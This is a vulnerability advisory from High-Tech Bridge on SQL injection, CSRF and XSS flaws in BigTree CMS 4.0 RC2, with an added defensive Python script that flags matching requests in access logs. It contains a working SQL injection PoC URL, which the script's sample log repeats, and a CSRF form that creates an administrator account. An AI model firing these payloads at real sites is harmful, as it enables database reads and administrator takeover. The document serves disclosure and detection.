Product: BigTree CMS
Vendor: BigTree CMS
Vulnerable Versions: 4.0 RC2 and probably prior
Tested Version: 4.0 RC2
Vendor Notification: July 17, 2013
Vendor Fix: July 17, 2013
Public Disclosure: August 7, 2013
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2013-4879, CVE-2013-4880, CVE-2013-4881
Risk Level: High
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P), 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BigTree CMS, which can be exploited to perform SQL injection, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks. A remote attacker can add, modify or delete information in the application's database and gain complete control over the application.
1) SQL Injection in BigTree CMS: CVE-2013-4879
The vulnerability exists due to insufficient sanitisation of user-supplied data passed to the "/site/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database.
The following PoC (Proof of Concept) code displays the version of the MySQL server:
http://[host]/site/index.php/%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27
This SQL injection vulnerability was independently discovered by the Vendor just before High-Tech Bridge Security Research Lab reported it.
2) Cross-Site Request Forgery (CSRF) in BigTree CMS: CVE-2013-4881
The vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can create a malicious web page containing a CSRF exploit, trick a logged-in administrator into opening that page, and thereby create a new user with administrative privileges.
The basic CSRF exploit below will create a new administrator "attacker" with password "password":
<form action="http://[host]/site/index.php/admin/users/create/" method="post" name="main">
<input type="hidden" name="email" value="email@example.com">
<input type="hidden" name="password" value="password">
<input type="hidden" name="level" value="1">
<input type="hidden" name="name" value="attacker">
<input type="hidden" name="company" value="company">
<input type="submit" id="btn">
</form>
3) Cross-Site Scripting (XSS) in BigTree CMS: CVE-2013-4880
The vulnerability exists due to insufficient filtration of user-supplied data in the "module" HTTP GET parameter passed to the "/site/index.php/admin/developer/modules/views/add/" URL. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the administrator's browser in the context of the vulnerable website.
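Added example, not part of the advisory: a small Python triage script that runs over constructed access-log lines and flags the three request shapes described in sections 1) to 3) (the error-based injection pattern in the /site/index.php/ path, a cross-origin POST to the user-creation endpoint, and a non-identifier "module" value on the views/add URL). The site origin, the combined log format and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format), not real traffic.
# Line 2 carries the advisory's SQL injection PoC path; line 4 is a legitimate
# same-origin submission that must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Aug/2013:10:00:01 +0000] "GET /site/index.php/about/ HTTP/1.1" 200 512 "http://www.example.com/site/" "UA"
203.0.113.5 - - [07/Aug/2013:10:00:02 +0000] "GET /site/index.php/%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27 HTTP/1.1" 500 0 "-" "UA"
203.0.113.7 - - [07/Aug/2013:10:00:03 +0000] "POST /site/index.php/admin/users/create/ HTTP/1.1" 302 0 "http://attacker.example.net/page.html" "UA"
203.0.113.9 - - [07/Aug/2013:10:00:04 +0000] "POST /site/index.php/admin/users/create/ HTTP/1.1" 302 0 "http://www.example.com/site/index.php/admin/" "UA"
203.0.113.7 - - [07/Aug/2013:10:00:05 +0000] "GET /site/index.php/admin/developer/modules/views/add/?module=%3Cb%3Ex%3C%2Fb%3E HTTP/1.1" 200 2048 "-" "UA"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$')
SITE_ORIGIN = "http://www.example.com"  # assumed: the deployment's own origin
# Error-based injection shape used by the PoC: a quote closing the path segment,
# then a subquery that reads information_schema.
SQLI_RE = re.compile(r"'\s*and\s*\(\s*select\b.*information_schema", re.I | re.S)
MODULE_OK = re.compile(r"^[A-Za-z0-9_-]*$")  # allowlist: module names are identifiers

def triage_line(line):
    """Return a list of (cve, reason) findings for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return [("unparsed", line[:40])]
    url = urlsplit(m["target"])
    path = unquote(url.path)  # decode once, then inspect the decoded form
    findings = []
    if path.startswith("/site/index.php/") and SQLI_RE.search(path):
        findings.append(("CVE-2013-4879", "error-based SQL injection pattern in path"))
    # A missing Referer ("-") is also flagged; a cross-site form post never carries a same-origin one.
    if (m["method"] == "POST" and path.endswith("/admin/users/create/")
            and not m["referer"].startswith(SITE_ORIGIN + "/")):
        findings.append(("CVE-2013-4881", f"cross-origin Referer {m['referer']!r} on user creation"))
    if path.endswith("/admin/developer/modules/views/add/"):
        for value in parse_qs(url.query, keep_blank_values=True).get("module", []):
            if not MODULE_OK.match(value):
                findings.append(("CVE-2013-4880", f"non-identifier module value {value!r}"))
    return findings

def triage(log_text):
    """Map each flagged line number (1-based) to its findings."""
    report = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        if hits := triage_line(line):
            report[n] = hits
    return report
```

Running `triage(SAMPLE_LOG)` flags lines 2, 3 and 5 and leaves the same-origin submission on line 4 alone.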
Replace the following files with their updated versions from GitHub:
High-Tech Bridge Advisory HTB23165 - https://www.htbridge.com/advisory/HTB23165 - Multiple Vulnerabilities in BigTree CMS.
BigTree CMS - http://www.bigtreecms.org/ - BigTree CMS is an open source content management system built on PHP and MySQL.
Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.